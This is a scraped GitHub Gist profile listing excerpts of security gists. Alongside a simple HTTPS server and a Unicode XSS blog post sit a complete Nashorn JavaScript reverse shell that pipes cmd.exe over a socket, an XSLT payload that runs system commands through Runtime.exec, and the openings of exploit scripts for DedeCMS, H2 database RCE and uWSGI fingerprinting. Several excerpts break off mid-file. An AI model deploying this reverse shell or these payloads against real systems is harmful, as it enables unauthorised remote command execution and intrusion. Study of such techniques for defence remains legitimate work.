Firebasky

😀
Learing
View GitHub Profile
import tiktoken
import langdetect
T = tiktoken.get_encoding("o200k_base")
length_dict = {}
for i in range(T.n_vocab):
    try:
        length_dict[i] = len(T.decode([i]))
    except:
@Firebasky
Firebasky / https_server.py
Created March 18, 2024 07:07 — forked from SeanPesce/https_server.py
Simple Python 3 HTTPS Server (SSL/TLS)
#!/usr/bin/env python3
# Author: Sean Pesce
# References:
# https://stackoverflow.com/questions/19705785/python-3-simple-https-server
# https://docs.python.org/3/library/ssl.html
# https://docs.python.org/3/library/http.server.html
# Shell command to create a self-signed TLS certificate and private key:
# openssl req -new -newkey rsa:4096 -x509 -sha256 -days 365 -nodes -out cert.crt -keyout private.key
@Firebasky
Firebasky / index.md
Created December 15, 2023 17:41 — forked from paj28/index.md

Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

@Firebasky
Firebasky / output.log
Created May 19, 2023 03:04 — forked from cgvwzq/output.log
Recursive CSS attribute leakage
[+] Server is listening on 5001
...pre-payoad:
...post-payoad:
...pre-payoad: d
...post-payoad: 3
...pre-payoad: d3
...post-payoad: d3
...pre-payoad: d3a
...post-payoad: 0d3
...pre-payoad: d3ad
@Firebasky
Firebasky / revsh.js
Created November 24, 2022 10:33 — forked from frohoff/revsh.js
Nashorn Javascript Reverse Shell
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();
var s=new java.net.Socket(host,port);
var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
var po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();
  po.flush();
  java.lang.Thread.sleep(50);
  try{p.exitValue();break;}catch(e){}
};
p.destroy();
s.close();
@Firebasky
Firebasky / demo.py
Last active October 16, 2022 12:33
uwsgi finger demo
# -*- coding: utf-8 -*-
# uWSGI 1.9 and above (latest 2.0.15; after it was reported to the maintainers, they fixed this issue in the 3.0 development version, which is not affected)
import socket
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ports = [8000, 8080, 8181, 9000]
Ip = ['']
info = ""
for port in ports:
    try:
        c.connect((Ip[0], port))
@Firebasky
Firebasky / exp.py
Last active October 14, 2022 09:27
dedecms exp
import requests
import time
import ddddocr
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium import webdriver
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-gpu')
driver = webdriver.Chrome(options=chrome_options)
#!/usr/bin/env python
'''
Exploit Title: Unauthenticated RCE
Date: 2018/09/24
Exploit Author: h4ckNinja
Vendor: http://www.h2database.com/
Version: all versions
Tested on: Linux, Mac
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')